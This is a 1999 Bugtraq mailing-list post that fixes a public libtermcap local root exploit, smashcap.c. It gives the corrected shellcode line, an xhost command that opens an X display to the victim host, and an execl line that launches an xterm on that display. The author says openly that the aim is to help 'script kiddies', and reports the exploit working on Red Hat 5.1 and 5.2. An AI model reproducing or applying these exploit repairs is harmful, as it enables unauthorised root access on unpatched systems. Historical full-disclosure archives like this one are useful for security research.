[11493] in bugtraq
libtermcap exploit fix ... smashcap.c
daemon@ATHENA.MIT.EDU (Hudin Lucian)
Tue Aug 24 14:04:02 1999
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.LNX.4.10.9908230104440.12666-100000@wild.transart.ro>
Date: Mon, 23 Aug 1999 01:18:16 +0300
Reply-To: Hudin Lucian <luci@WILD.TRANSART.RO>
From: Hudin Lucian <luci@WILD.TRANSART.RO>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <E11IW9S-0001fX-00@the-village.bc.nu>
Hi, since bugtraq it's a full-disclosure list, let's
help the script kiddies a bit and scare the sysadms a little bit more...
To make the smashcap.c work , all you have to do is remove one
0xff character before /bin/sh in the shellcode
so the line would be :
"\x80\xe8\xdc\xff\xff\xff/bin/sh"
instead of :
"\x80\xe8\xdc\xff\xff\xff\xff/bin/sh"
also, you'll have to be on console running x to exploit it, but
if you have another box where you can start x then it's ok
myhost$ startx;xhost +victim.com
victim$ ./smashcap
and modify the last line from the smashcap.c into
execl("/usr/X11R6/bin/xterm","xterm", "-display",
"victim.com:0", 0);
well, it works on most redhats (tested on 5.1 and 5.2)
on slakware it sigsegv's , you need to work a little bit, sorry I don't
have a slakware box to work on .
regards, lucysoft
